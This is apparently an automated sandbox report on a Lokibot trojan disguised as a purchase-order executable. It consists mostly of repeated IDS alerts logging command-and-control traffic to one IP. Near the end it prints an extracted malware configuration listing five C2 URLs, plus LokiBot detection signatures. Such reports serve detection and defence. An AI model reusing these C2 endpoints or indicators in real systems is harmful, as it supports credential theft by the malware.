                      2024-10-24T17:03:11.602829+020020243131Malware Command and Control Activity Detected192.168.2.549995188.114.96.380TCP
                      2024-10-24T17:03:15.147284+020020243131Malware Command and Control Activity Detected192.168.2.550002188.114.96.380TCP
                      2024-10-24T17:03:16.206577+020020243131Malware Command and Control Activity Detected192.168.2.550010188.114.96.380TCP
                      2024-10-24T17:03:17.263597+020020243131Malware Command and Control Activity Detected192.168.2.550013188.114.96.380TCP
                      2024-10-24T17:03:18.465606+020020243131Malware Command and Control Activity Detected192.168.2.550019188.114.96.380TCP
                      2024-10-24T17:03:19.665855+020020243131Malware Command and Control Activity Detected192.168.2.550022188.114.96.380TCP
                      2024-10-24T17:03:20.770740+020020243131Malware Command and Control Activity Detected192.168.2.550023188.114.96.380TCP
                      2024-10-24T17:03:21.810046+020020243131Malware Command and Control Activity Detected192.168.2.550024188.114.96.380TCP
                      2024-10-24T17:03:23.173241+020020243131Malware Command and Control Activity Detected192.168.2.550025188.114.96.380TCP
                      2024-10-24T17:03:24.271557+020020243131Malware Command and Control Activity Detected192.168.2.550026188.114.96.380TCP
                      2024-10-24T17:03:26.405618+020020243131Malware Command and Control Activity Detected192.168.2.550027188.114.96.380TCP
                      2024-10-24T17:03:29.670904+020020243131Malware Command and Control Activity Detected192.168.2.550028188.114.96.380TCP
                      2024-10-24T17:03:30.974836+020020243131Malware Command and Control Activity Detected192.168.2.550029188.114.96.380TCP
                      2024-10-24T17:03:32.097071+020020243131Malware Command and Control Activity Detected192.168.2.550030188.114.96.380TCP
                      2024-10-24T17:03:33.257287+020020243131Malware Command and Control Activity Detected192.168.2.550031188.114.96.380TCP
                      2024-10-24T17:03:34.907115+020020243131Malware Command and Control Activity Detected192.168.2.550032188.114.96.380TCP
                      2024-10-24T17:03:36.731690+020020243131Malware Command and Control Activity Detected192.168.2.550033188.114.96.380TCP
                      2024-10-24T17:03:38.767572+020020243131Malware Command and Control Activity Detected192.168.2.550034188.114.96.380TCP
                      2024-10-24T17:03:40.378665+020020243131Malware Command and Control Activity Detected192.168.2.550035188.114.96.380TCP
                      2024-10-24T17:03:40.811483+020020243131Malware Command and Control Activity Detected192.168.2.550036188.114.96.380TCP
                      2024-10-24T17:03:43.222325+020020243131Malware Command and Control Activity Detected192.168.2.550037188.114.96.380TCP
                      2024-10-24T17:03:44.266809+020020243131Malware Command and Control Activity Detected192.168.2.550038188.114.96.380TCP
                      2024-10-24T17:03:45.899764+020020243131Malware Command and Control Activity Detected192.168.2.550039188.114.96.380TCP
                      2024-10-24T17:03:49.447135+020020243131Malware Command and Control Activity Detected192.168.2.550040188.114.96.380TCP
                      2024-10-24T17:03:51.258797+020020243131Malware Command and Control Activity Detected192.168.2.550041188.114.96.380TCP
                      2024-10-24T17:03:52.944528+020020243131Malware Command and Control Activity Detected192.168.2.550042188.114.96.380TCP
                      2024-10-24T17:03:56.758959+020020243131Malware Command and Control Activity Detected192.168.2.550043188.114.96.380TCP
                      2024-10-24T17:03:58.362070+020020243131Malware Command and Control Activity Detected192.168.2.550044188.114.96.380TCP
                      2024-10-24T17:04:03.635176+020020243131Malware Command and Control Activity Detected192.168.2.550045188.114.96.380TCP
                      2024-10-24T17:04:04.695816+020020243131Malware Command and Control Activity Detected192.168.2.550046188.114.96.380TCP
                      2024-10-24T17:04:06.227709+020020243131Malware Command and Control Activity Detected192.168.2.550047188.114.96.380TCP
                      2024-10-24T17:04:07.732122+020020243131Malware Command and Control Activity Detected192.168.2.550048188.114.96.380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:10.024741+020020243181Malware Command and Control Activity Detected192.168.2.549706188.114.96.380TCP
                      2024-10-24T17:02:11.080802+020020243181Malware Command and Control Activity Detected192.168.2.549707188.114.96.380TCP
                      2024-10-24T17:02:12.208821+020020243181Malware Command and Control Activity Detected192.168.2.549708188.114.96.380TCP
                      2024-10-24T17:02:13.387417+020020243181Malware Command and Control Activity Detected192.168.2.549709188.114.96.380TCP
                      2024-10-24T17:02:16.923354+020020243181Malware Command and Control Activity Detected192.168.2.549710188.114.96.380TCP
                      2024-10-24T17:02:20.447398+020020243181Malware Command and Control Activity Detected192.168.2.549717188.114.96.380TCP
                      2024-10-24T17:02:21.532098+020020243181Malware Command and Control Activity Detected192.168.2.549735188.114.96.380TCP
                      2024-10-24T17:02:22.993659+020020243181Malware Command and Control Activity Detected192.168.2.549745188.114.96.380TCP
                      2024-10-24T17:02:24.412934+020020243181Malware Command and Control Activity Detected192.168.2.549757188.114.96.380TCP
                      2024-10-24T17:02:25.588806+020020243181Malware Command and Control Activity Detected192.168.2.549763188.114.96.380TCP
                      2024-10-24T17:02:26.637709+020020243181Malware Command and Control Activity Detected192.168.2.549774188.114.96.380TCP
                      2024-10-24T17:02:27.669186+020020243181Malware Command and Control Activity Detected192.168.2.549780188.114.96.380TCP
                      2024-10-24T17:02:28.718139+020020243181Malware Command and Control Activity Detected192.168.2.549786188.114.96.380TCP
                      2024-10-24T17:02:29.781591+020020243181Malware Command and Control Activity Detected192.168.2.549792188.114.96.380TCP
                      2024-10-24T17:02:30.857303+020020243181Malware Command and Control Activity Detected192.168.2.549798188.114.96.380TCP
                      2024-10-24T17:02:33.136591+020020243181Malware Command and Control Activity Detected192.168.2.549806188.114.96.380TCP
                      2024-10-24T17:02:34.213681+020020243181Malware Command and Control Activity Detected192.168.2.549820188.114.96.380TCP
                      2024-10-24T17:02:35.272272+020020243181Malware Command and Control Activity Detected192.168.2.549826188.114.96.380TCP
                      2024-10-24T17:02:37.391379+020020243181Malware Command and Control Activity Detected192.168.2.549832188.114.96.380TCP
                      2024-10-24T17:02:38.478307+020020243181Malware Command and Control Activity Detected192.168.2.549845188.114.96.380TCP
                      2024-10-24T17:02:39.504866+020020243181Malware Command and Control Activity Detected192.168.2.549853188.114.96.380TCP
                      2024-10-24T17:02:40.706963+020020243181Malware Command and Control Activity Detected192.168.2.549859188.114.96.380TCP
                      2024-10-24T17:02:42.062394+020020243181Malware Command and Control Activity Detected192.168.2.549866188.114.96.380TCP
                      2024-10-24T17:02:43.137633+020020243181Malware Command and Control Activity Detected192.168.2.549875188.114.96.380TCP
                      2024-10-24T17:02:45.392280+020020243181Malware Command and Control Activity Detected192.168.2.549881188.114.96.380TCP
                      2024-10-24T17:02:46.416414+020020243181Malware Command and Control Activity Detected192.168.2.549893188.114.96.380TCP
                      2024-10-24T17:02:47.642217+020020243181Malware Command and Control Activity Detected192.168.2.549899188.114.96.380TCP
                      2024-10-24T17:02:50.896699+020020243181Malware Command and Control Activity Detected192.168.2.549907188.114.96.380TCP
                      2024-10-24T17:02:53.493288+020020243181Malware Command and Control Activity Detected192.168.2.549925188.114.96.380TCP
                      2024-10-24T17:02:58.098284+020020243181Malware Command and Control Activity Detected192.168.2.549941188.114.96.380TCP
                      2024-10-24T17:02:59.277600+020020243181Malware Command and Control Activity Detected192.168.2.549963188.114.96.380TCP
                      2024-10-24T17:03:00.368673+020020243181Malware Command and Control Activity Detected192.168.2.549968188.114.96.380TCP
                      2024-10-24T17:03:01.522800+020020243181Malware Command and Control Activity Detected192.168.2.549972188.114.96.380TCP
                      2024-10-24T17:03:03.971789+020020243181Malware Command and Control Activity Detected192.168.2.549976188.114.96.380TCP
                      2024-10-24T17:03:05.022507+020020243181Malware Command and Control Activity Detected192.168.2.549980188.114.96.380TCP
                      2024-10-24T17:03:06.083279+020020243181Malware Command and Control Activity Detected192.168.2.549983188.114.96.380TCP
                      2024-10-24T17:03:07.269902+020020243181Malware Command and Control Activity Detected192.168.2.549987188.114.96.380TCP
                      2024-10-24T17:03:08.761558+020020243181Malware Command and Control Activity Detected192.168.2.549990188.114.96.380TCP
                      2024-10-24T17:03:11.602829+020020243181Malware Command and Control Activity Detected192.168.2.549995188.114.96.380TCP
                      2024-10-24T17:03:15.147284+020020243181Malware Command and Control Activity Detected192.168.2.550002188.114.96.380TCP
                      2024-10-24T17:03:16.206577+020020243181Malware Command and Control Activity Detected192.168.2.550010188.114.96.380TCP
                      2024-10-24T17:03:17.263597+020020243181Malware Command and Control Activity Detected192.168.2.550013188.114.96.380TCP
                      2024-10-24T17:03:18.465606+020020243181Malware Command and Control Activity Detected192.168.2.550019188.114.96.380TCP
                      2024-10-24T17:03:19.665855+020020243181Malware Command and Control Activity Detected192.168.2.550022188.114.96.380TCP
                      2024-10-24T17:03:20.770740+020020243181Malware Command and Control Activity Detected192.168.2.550023188.114.96.380TCP
                      2024-10-24T17:03:21.810046+020020243181Malware Command and Control Activity Detected192.168.2.550024188.114.96.380TCP
                      2024-10-24T17:03:23.173241+020020243181Malware Command and Control Activity Detected192.168.2.550025188.114.96.380TCP
                      2024-10-24T17:03:24.271557+020020243181Malware Command and Control Activity Detected192.168.2.550026188.114.96.380TCP
                      2024-10-24T17:03:26.405618+020020243181Malware Command and Control Activity Detected192.168.2.550027188.114.96.380TCP
                      2024-10-24T17:03:29.670904+020020243181Malware Command and Control Activity Detected192.168.2.550028188.114.96.380TCP
                      2024-10-24T17:03:30.974836+020020243181Malware Command and Control Activity Detected192.168.2.550029188.114.96.380TCP
                      2024-10-24T17:03:32.097071+020020243181Malware Command and Control Activity Detected192.168.2.550030188.114.96.380TCP
                      2024-10-24T17:03:33.257287+020020243181Malware Command and Control Activity Detected192.168.2.550031188.114.96.380TCP
                      2024-10-24T17:03:34.907115+020020243181Malware Command and Control Activity Detected192.168.2.550032188.114.96.380TCP
                      2024-10-24T17:03:36.731690+020020243181Malware Command and Control Activity Detected192.168.2.550033188.114.96.380TCP
                      2024-10-24T17:03:38.767572+020020243181Malware Command and Control Activity Detected192.168.2.550034188.114.96.380TCP
                      2024-10-24T17:03:40.378665+020020243181Malware Command and Control Activity Detected192.168.2.550035188.114.96.380TCP
                      2024-10-24T17:03:40.811483+020020243181Malware Command and Control Activity Detected192.168.2.550036188.114.96.380TCP
                      2024-10-24T17:03:43.222325+020020243181Malware Command and Control Activity Detected192.168.2.550037188.114.96.380TCP
                      2024-10-24T17:03:44.266809+020020243181Malware Command and Control Activity Detected192.168.2.550038188.114.96.380TCP
                      2024-10-24T17:03:45.899764+020020243181Malware Command and Control Activity Detected192.168.2.550039188.114.96.380TCP
                      2024-10-24T17:03:49.447135+020020243181Malware Command and Control Activity Detected192.168.2.550040188.114.96.380TCP
                      2024-10-24T17:03:51.258797+020020243181Malware Command and Control Activity Detected192.168.2.550041188.114.96.380TCP
                      2024-10-24T17:03:52.944528+020020243181Malware Command and Control Activity Detected192.168.2.550042188.114.96.380TCP
                      2024-10-24T17:03:56.758959+020020243181Malware Command and Control Activity Detected192.168.2.550043188.114.96.380TCP
                      2024-10-24T17:03:58.362070+020020243181Malware Command and Control Activity Detected192.168.2.550044188.114.96.380TCP
                      2024-10-24T17:04:03.635176+020020243181Malware Command and Control Activity Detected192.168.2.550045188.114.96.380TCP
                      2024-10-24T17:04:04.695816+020020243181Malware Command and Control Activity Detected192.168.2.550046188.114.96.380TCP
                      2024-10-24T17:04:06.227709+020020243181Malware Command and Control Activity Detected192.168.2.550047188.114.96.380TCP
                      2024-10-24T17:04:07.732122+020020243181Malware Command and Control Activity Detected192.168.2.550048188.114.96.380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:06.733299+020020216411A Network Trojan was detected192.168.2.549704188.114.96.380TCP
                      2024-10-24T17:02:07.830536+020020216411A Network Trojan was detected192.168.2.549705188.114.96.380TCP
                      2024-10-24T17:02:08.934078+020020216411A Network Trojan was detected192.168.2.549706188.114.96.380TCP
                      2024-10-24T17:02:10.185322+020020216411A Network Trojan was detected192.168.2.549707188.114.96.380TCP
                      2024-10-24T17:02:11.235526+020020216411A Network Trojan was detected192.168.2.549708188.114.96.380TCP
                      2024-10-24T17:02:12.361135+020020216411A Network Trojan was detected192.168.2.549709188.114.96.380TCP
                      2024-10-24T17:02:13.549321+020020216411A Network Trojan was detected192.168.2.549710188.114.96.380TCP
                      2024-10-24T17:02:17.079419+020020216411A Network Trojan was detected192.168.2.549717188.114.96.380TCP
                      2024-10-24T17:02:20.619456+020020216411A Network Trojan was detected192.168.2.549735188.114.96.380TCP
                      2024-10-24T17:02:21.691587+020020216411A Network Trojan was detected192.168.2.549745188.114.96.380TCP
                      2024-10-24T17:02:23.211146+020020216411A Network Trojan was detected192.168.2.549757188.114.96.380TCP
                      2024-10-24T17:02:24.561675+020020216411A Network Trojan was detected192.168.2.549763188.114.96.380TCP
                      2024-10-24T17:02:25.747925+020020216411A Network Trojan was detected192.168.2.549774188.114.96.380TCP
                      2024-10-24T17:02:26.794870+020020216411A Network Trojan was detected192.168.2.549780188.114.96.380TCP
                      2024-10-24T17:02:27.825461+020020216411A Network Trojan was detected192.168.2.549786188.114.96.380TCP
                      2024-10-24T17:02:28.879212+020020216411A Network Trojan was detected192.168.2.549792188.114.96.380TCP
                      2024-10-24T17:02:29.936630+020020216411A Network Trojan was detected192.168.2.549798188.114.96.380TCP
                      2024-10-24T17:02:31.015360+020020216411A Network Trojan was detected192.168.2.549806188.114.96.380TCP
                      2024-10-24T17:02:33.298933+020020216411A Network Trojan was detected192.168.2.549820188.114.96.380TCP
                      2024-10-24T17:02:34.372256+020020216411A Network Trojan was detected192.168.2.549826188.114.96.380TCP
                      2024-10-24T17:02:35.421423+020020216411A Network Trojan was detected192.168.2.549832188.114.96.380TCP
                      2024-10-24T17:02:37.545568+020020216411A Network Trojan was detected192.168.2.549845188.114.96.380TCP
                      2024-10-24T17:02:38.638011+020020216411A Network Trojan was detected192.168.2.549853188.114.96.380TCP
                      2024-10-24T17:02:39.658318+020020216411A Network Trojan was detected192.168.2.549859188.114.96.380TCP
                      2024-10-24T17:02:40.998847+020020216411A Network Trojan was detected192.168.2.549866188.114.96.380TCP
                      2024-10-24T17:02:42.218170+020020216411A Network Trojan was detected192.168.2.549875188.114.96.380TCP
                      2024-10-24T17:02:43.317732+020020216411A Network Trojan was detected192.168.2.549881188.114.96.380TCP
                      2024-10-24T17:02:45.544944+020020216411A Network Trojan was detected192.168.2.549893188.114.96.380TCP
                      2024-10-24T17:02:46.580422+020020216411A Network Trojan was detected192.168.2.549899188.114.96.380TCP
                      2024-10-24T17:02:47.796961+020020216411A Network Trojan was detected192.168.2.549907188.114.96.380TCP
                      2024-10-24T17:02:51.046250+020020216411A Network Trojan was detected192.168.2.549925188.114.96.380TCP
                      2024-10-24T17:02:53.656102+020020216411A Network Trojan was detected192.168.2.549941188.114.96.380TCP
                      2024-10-24T17:02:58.245581+020020216411A Network Trojan was detected192.168.2.549963188.114.96.380TCP
                      2024-10-24T17:02:59.443401+020020216411A Network Trojan was detected192.168.2.549968188.114.96.380TCP
                      2024-10-24T17:03:00.546134+020020216411A Network Trojan was detected192.168.2.549972188.114.96.380TCP
                      2024-10-24T17:03:01.672985+020020216411A Network Trojan was detected192.168.2.549976188.114.96.380TCP
                      2024-10-24T17:03:04.124054+020020216411A Network Trojan was detected192.168.2.549980188.114.96.380TCP
                      2024-10-24T17:03:05.169370+020020216411A Network Trojan was detected192.168.2.549983188.114.96.380TCP
                      2024-10-24T17:03:06.232216+020020216411A Network Trojan was detected192.168.2.549987188.114.96.380TCP
                      2024-10-24T17:03:07.418539+020020216411A Network Trojan was detected192.168.2.549990188.114.96.380TCP
                      2024-10-24T17:03:08.919860+020020216411A Network Trojan was detected192.168.2.549995188.114.96.380TCP
                      2024-10-24T17:03:11.777745+020020216411A Network Trojan was detected192.168.2.550002188.114.96.380TCP
                      2024-10-24T17:03:15.310031+020020216411A Network Trojan was detected192.168.2.550010188.114.96.380TCP
                      2024-10-24T17:03:16.352682+020020216411A Network Trojan was detected192.168.2.550013188.114.96.380TCP
                      2024-10-24T17:03:17.420331+020020216411A Network Trojan was detected192.168.2.550019188.114.96.380TCP
                      2024-10-24T17:03:18.620369+020020216411A Network Trojan was detected192.168.2.550022188.114.96.380TCP
                      2024-10-24T17:03:19.829825+020020216411A Network Trojan was detected192.168.2.550023188.114.96.380TCP
                      2024-10-24T17:03:20.922651+020020216411A Network Trojan was detected192.168.2.550024188.114.96.380TCP
                      2024-10-24T17:03:21.973153+020020216411A Network Trojan was detected192.168.2.550025188.114.96.380TCP
                      2024-10-24T17:03:23.325611+020020216411A Network Trojan was detected192.168.2.550026188.114.96.380TCP
                      2024-10-24T17:03:24.421552+020020216411A Network Trojan was detected192.168.2.550027188.114.96.380TCP
                      2024-10-24T17:03:26.571665+020020216411A Network Trojan was detected192.168.2.550028188.114.96.380TCP
                      2024-10-24T17:03:29.956285+020020216411A Network Trojan was detected192.168.2.550029188.114.96.380TCP
                      2024-10-24T17:03:31.134751+020020216411A Network Trojan was detected192.168.2.550030188.114.96.380TCP
                      2024-10-24T17:03:32.261893+020020216411A Network Trojan was detected192.168.2.550031188.114.96.380TCP
                      2024-10-24T17:03:33.465689+020020216411A Network Trojan was detected192.168.2.550032188.114.96.380TCP
                      2024-10-24T17:03:35.059300+020020216411A Network Trojan was detected192.168.2.550033188.114.96.380TCP
                      2024-10-24T17:03:36.887347+020020216411A Network Trojan was detected192.168.2.550034188.114.96.380TCP
                      2024-10-24T17:03:38.921832+020020216411A Network Trojan was detected192.168.2.550035188.114.96.380TCP
                      2024-10-24T17:03:40.811483+020020216411A Network Trojan was detected192.168.2.550036188.114.96.380TCP
                      2024-10-24T17:03:41.883240+020020216411A Network Trojan was detected192.168.2.550037188.114.96.380TCP
                      2024-10-24T17:03:43.376184+020020216411A Network Trojan was detected192.168.2.550038188.114.96.380TCP
                      2024-10-24T17:03:44.476668+020020216411A Network Trojan was detected192.168.2.550039188.114.96.380TCP
                      2024-10-24T17:03:46.083585+020020216411A Network Trojan was detected192.168.2.550040188.114.96.380TCP
                      2024-10-24T17:03:49.605447+020020216411A Network Trojan was detected192.168.2.550041188.114.96.380TCP
                      2024-10-24T17:03:51.419744+020020216411A Network Trojan was detected192.168.2.550042188.114.96.380TCP
                      2024-10-24T17:03:53.091767+020020216411A Network Trojan was detected192.168.2.550043188.114.96.380TCP
                      2024-10-24T17:03:56.917338+020020216411A Network Trojan was detected192.168.2.550044188.114.96.380TCP
                      2024-10-24T17:03:58.513507+020020216411A Network Trojan was detected192.168.2.550045188.114.96.380TCP
                      2024-10-24T17:04:03.807044+020020216411A Network Trojan was detected192.168.2.550046188.114.96.380TCP
                      2024-10-24T17:04:04.868950+020020216411A Network Trojan was detected192.168.2.550047188.114.96.380TCP
                      2024-10-24T17:04:06.395715+020020216411A Network Trojan was detected192.168.2.550048188.114.96.380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-24T17:02:06.733299+020028257661Malware Command and Control Activity Detected192.168.2.549704188.114.96.380TCP
                      2024-10-24T17:02:07.830536+020028257661Malware Command and Control Activity Detected192.168.2.549705188.114.96.380TCP
                      2024-10-24T17:02:08.934078+020028257661Malware Command and Control Activity Detected192.168.2.549706188.114.96.380TCP
                      2024-10-24T17:02:10.185322+020028257661Malware Command and Control Activity Detected192.168.2.549707188.114.96.380TCP
                      2024-10-24T17:02:11.235526+020028257661Malware Command and Control Activity Detected192.168.2.549708188.114.96.380TCP
                      2024-10-24T17:02:12.361135+020028257661Malware Command and Control Activity Detected192.168.2.549709188.114.96.380TCP
                      2024-10-24T17:02:13.549321+020028257661Malware Command and Control Activity Detected192.168.2.549710188.114.96.380TCP
                      2024-10-24T17:02:17.079419+020028257661Malware Command and Control Activity Detected192.168.2.549717188.114.96.380TCP
                      2024-10-24T17:02:20.619456+020028257661Malware Command and Control Activity Detected192.168.2.549735188.114.96.380TCP
                      2024-10-24T17:02:21.691587+020028257661Malware Command and Control Activity Detected192.168.2.549745188.114.96.380TCP
                      2024-10-24T17:02:23.211146+020028257661Malware Command and Control Activity Detected192.168.2.549757188.114.96.380TCP
                      2024-10-24T17:02:24.561675+020028257661Malware Command and Control Activity Detected192.168.2.549763188.114.96.380TCP
                      2024-10-24T17:02:25.747925+020028257661Malware Command and Control Activity Detected192.168.2.549774188.114.96.380TCP
                      2024-10-24T17:02:26.794870+020028257661Malware Command and Control Activity Detected192.168.2.549780188.114.96.380TCP
                      2024-10-24T17:02:27.825461+020028257661Malware Command and Control Activity Detected192.168.2.549786188.114.96.380TCP
                      2024-10-24T17:02:28.879212+020028257661Malware Command and Control Activity Detected192.168.2.549792188.114.96.380TCP
                      2024-10-24T17:02:29.936630+020028257661Malware Command and Control Activity Detected192.168.2.549798188.114.96.380TCP
                      2024-10-24T17:02:31.015360+020028257661Malware Command and Control Activity Detected192.168.2.549806188.114.96.380TCP
                      2024-10-24T17:02:33.298933+020028257661Malware Command and Control Activity Detected192.168.2.549820188.114.96.380TCP
                      2024-10-24T17:02:34.372256+020028257661Malware Command and Control Activity Detected192.168.2.549826188.114.96.380TCP
                      2024-10-24T17:02:35.421423+020028257661Malware Command and Control Activity Detected192.168.2.549832188.114.96.380TCP
                      2024-10-24T17:02:37.545568+020028257661Malware Command and Control Activity Detected192.168.2.549845188.114.96.380TCP
                      2024-10-24T17:02:38.638011+020028257661Malware Command and Control Activity Detected192.168.2.549853188.114.96.380TCP
                      2024-10-24T17:02:39.658318+020028257661Malware Command and Control Activity Detected192.168.2.549859188.114.96.380TCP
                      2024-10-24T17:02:40.998847+020028257661Malware Command and Control Activity Detected192.168.2.549866188.114.96.380TCP
                      2024-10-24T17:02:42.218170+020028257661Malware Command and Control Activity Detected192.168.2.549875188.114.96.380TCP
                      2024-10-24T17:02:43.317732+020028257661Malware Command and Control Activity Detected192.168.2.549881188.114.96.380TCP
                      2024-10-24T17:02:45.544944+020028257661Malware Command and Control Activity Detected192.168.2.549893188.114.96.380TCP
                      2024-10-24T17:02:46.580422+020028257661Malware Command and Control Activity Detected192.168.2.549899188.114.96.380TCP
                      2024-10-24T17:02:47.796961+020028257661Malware Command and Control Activity Detected192.168.2.549907188.114.96.380TCP
                      2024-10-24T17:02:51.046250+020028257661Malware Command and Control Activity Detected192.168.2.549925188.114.96.380TCP
                      2024-10-24T17:02:53.656102+020028257661Malware Command and Control Activity Detected192.168.2.549941188.114.96.380TCP
                      2024-10-24T17:02:58.245581+020028257661Malware Command and Control Activity Detected192.168.2.549963188.114.96.380TCP
                      2024-10-24T17:02:59.443401+020028257661Malware Command and Control Activity Detected192.168.2.549968188.114.96.380TCP
                      2024-10-24T17:03:00.546134+020028257661Malware Command and Control Activity Detected192.168.2.549972188.114.96.380TCP
                      2024-10-24T17:03:01.672985+020028257661Malware Command and Control Activity Detected192.168.2.549976188.114.96.380TCP
                      2024-10-24T17:03:04.124054+020028257661Malware Command and Control Activity Detected192.168.2.549980188.114.96.380TCP
                      2024-10-24T17:03:05.169370+020028257661Malware Command and Control Activity Detected192.168.2.549983188.114.96.380TCP
                      2024-10-24T17:03:06.232216+020028257661Malware Command and Control Activity Detected192.168.2.549987188.114.96.380TCP
                      2024-10-24T17:03:07.418539+020028257661Malware Command and Control Activity Detected192.168.2.549990188.114.96.380TCP
                      2024-10-24T17:03:08.919860+020028257661Malware Command and Control Activity Detected192.168.2.549995188.114.96.380TCP
                      2024-10-24T17:03:11.777745+020028257661Malware Command and Control Activity Detected192.168.2.550002188.114.96.380TCP
                      2024-10-24T17:03:15.310031+020028257661Malware Command and Control Activity Detected192.168.2.550010188.114.96.380TCP
                      2024-10-24T17:03:16.352682+020028257661Malware Command and Control Activity Detected192.168.2.550013188.114.96.380TCP
                      2024-10-24T17:03:17.420331+020028257661Malware Command and Control Activity Detected192.168.2.550019188.114.96.380TCP
                      2024-10-24T17:03:18.620369+020028257661Malware Command and Control Activity Detected192.168.2.550022188.114.96.380TCP
                      2024-10-24T17:03:19.829825+020028257661Malware Command and Control Activity Detected192.168.2.550023188.114.96.380TCP
                      2024-10-24T17:03:20.922651+020028257661Malware Command and Control Activity Detected192.168.2.550024188.114.96.380TCP
                      2024-10-24T17:03:21.973153+020028257661Malware Command and Control Activity Detected192.168.2.550025188.114.96.380TCP
                      2024-10-24T17:03:23.325611+020028257661Malware Command and Control Activity Detected192.168.2.550026188.114.96.380TCP
                      2024-10-24T17:03:24.421552+020028257661Malware Command and Control Activity Detected192.168.2.550027188.114.96.380TCP
                      2024-10-24T17:03:26.571665+020028257661Malware Command and Control Activity Detected192.168.2.550028188.114.96.380TCP
                      2024-10-24T17:03:29.956285+020028257661Malware Command and Control Activity Detected192.168.2.550029188.114.96.380TCP
                      2024-10-24T17:03:31.134751+020028257661Malware Command and Control Activity Detected192.168.2.550030188.114.96.380TCP
                      2024-10-24T17:03:32.261893+020028257661Malware Command and Control Activity Detected192.168.2.550031188.114.96.380TCP
                      2024-10-24T17:03:33.465689+020028257661Malware Command and Control Activity Detected192.168.2.550032188.114.96.380TCP
                      2024-10-24T17:03:35.059300+020028257661Malware Command and Control Activity Detected192.168.2.550033188.114.96.380TCP
                      2024-10-24T17:03:36.887347+020028257661Malware Command and Control Activity Detected192.168.2.550034188.114.96.380TCP
                      2024-10-24T17:03:38.921832+020028257661Malware Command and Control Activity Detected192.168.2.550035188.114.96.380TCP
                      2024-10-24T17:03:40.811483+020028257661Malware Command and Control Activity Detected192.168.2.550036188.114.96.380TCP
                      2024-10-24T17:03:41.883240+020028257661Malware Command and Control Activity Detected192.168.2.550037188.114.96.380TCP
                      2024-10-24T17:03:43.376184+020028257661Malware Command and Control Activity Detected192.168.2.550038188.114.96.380TCP
                      2024-10-24T17:03:44.476668+020028257661Malware Command and Control Activity Detected192.168.2.550039188.114.96.380TCP
                      2024-10-24T17:03:46.083585+020028257661Malware Command and Control Activity Detected192.168.2.550040188.114.96.380TCP
                      2024-10-24T17:03:49.605447+020028257661Malware Command and Control Activity Detected192.168.2.550041188.114.96.380TCP
                      2024-10-24T17:03:51.419744+020028257661Malware Command and Control Activity Detected192.168.2.550042188.114.96.380TCP
                      2024-10-24T17:03:53.091767+020028257661Malware Command and Control Activity Detected192.168.2.550043188.114.96.380TCP
                      2024-10-24T17:03:56.917338+020028257661Malware Command and Control Activity Detected192.168.2.550044188.114.96.380TCP
                      2024-10-24T17:03:58.513507+020028257661Malware Command and Control Activity Detected192.168.2.550045188.114.96.380TCP
                      2024-10-24T17:04:03.807044+020028257661Malware Command and Control Activity Detected192.168.2.550046188.114.96.380TCP
                      2024-10-24T17:04:04.868950+020028257661Malware Command and Control Activity Detected192.168.2.550047188.114.96.380TCP
                      2024-10-24T17:04:06.395715+020028257661Malware Command and Control Activity Detected192.168.2.550048188.114.96.380TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeAvira: detected
                      Source: 00000000.00000002.2115300674.0000000003085000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://dddotx.shop/Mine/PWS/fre.php"]}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeJoe Sandbox ML: detected
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: rPedidodecompra__PO20441__ARIMComponentes.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: BATMAN.pdbxD source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: WindowsFormsApp1.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3328577920.00000000009C2000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: BATMAN.pdb source: rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115259335.0000000002F10000.00000004.08000000.00040000.00000000.sdmp, rPedidodecompra__PO20441__ARIMComponentes.exe, 00000000.00000002.2115300674.0000000003041000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49757 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49708 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49708 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49704 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49706 -> 188.114.96.3:80
                      Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49706 -> 188.114.96.3:80
